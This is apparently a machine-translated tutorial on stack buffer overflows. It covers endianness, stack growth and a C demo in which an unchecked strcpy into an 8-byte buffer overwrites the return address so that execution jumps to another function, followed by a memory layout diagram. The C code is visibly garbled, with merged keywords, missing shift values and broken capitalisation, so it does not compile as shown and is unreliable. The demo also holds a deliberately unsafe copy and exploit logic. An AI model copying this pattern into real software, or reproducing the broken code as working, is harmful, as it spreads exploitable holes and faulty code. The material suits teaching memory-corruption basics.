Buffer overflow utilization (function jump)

Big endian: The high-order byte of data is stored at the low-end of the address byte stored at the address high end

Small-endian: high-order bytes of data are stored at the high-end byte of the address at the low end of the address (e.g. x86)

Stack growth direction: from high address to low address

Buffer overflow: When the computer fills the buffer with data bits, it exceeds the capacity of the buffer itself, so that the overflow data is overwritten on the legitimate data, the buffer is overrun by writing content beyond its length to the program's buffer, which destroys the program's stack, causing the program to crash or to turn the program to execute other instructions.

#include <stdio.h>#include<stdlib.h>#include<string.h>#include<iostream>intK;voidFunConst Char*input) {    Charbuf[8];    strcpy (Buf,input); printf ("Address of Input=%p\n", input); printf ("Address of Buf=%p\n", BUF); K=(int) &input-(int) buf; printf ("%s\n", buf);}voidhaha () {printf ("\nok!success");}intMainintargcChar*argv[]) {printf ("Address of Foo=%p\n", fun); printf ("Address of Haha=%p\n", haha); voidhaha (); intaddr[4]; Chars[]="FINDK"; printf ("Address of S=%p\n", s);    Fun (s); printf ("%d\n", K); intGo= (int) &haha; printf ("Address of &haha=%p\n",&haha); //separating the address of the haha () function into bytesaddr[0]= (Go << -) >> -; addr[1]= (Go << -) >> -; addr[2]= (Go <<8) >> -; addr[3]=go>> -;Charss[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";  for(intj=0;j<4; j + +) {ss[k-j-1]=addr[3-J];    } fun (ss); return 0;}

The fun () function buf only 8 bytes of space, by writing a string SS beyond its length, and passing in the Void fun () function to assign a value to BUF so that the stack overflow when calling the fun () function, overwriting the return address, The SS input portion of the construct happens to make the contents of the return address part exactly point to the haha () function entry, so that the program does not return to the previous step (that is, the return instruction below the call to the fun () function in the main function), but instead enters the haha () function while executing the haha () The printf ("\nok!success") directive in the function that prints out the ok!success on the screen

Memory model:

00401019----haha

00401005----Fun

..........................

0012ff68----s= "FINDK"

..........................

0012FF30----ss= "AAAAAAAAAAAAAAAAAAAAAAAA"

..........................

0012FEDC----Input (&S,&SS)

... (3byte) here 4bytes is overwritten with the new address value, will jump haha

0012fed8---- function return address //When a function is called, the first argument is the stack, then the return address

.... (4byte)

0012FED3----BUF[7]

...... (6byte)

0012FECC----Buf[0]

Buffer overflow utilization (function jump)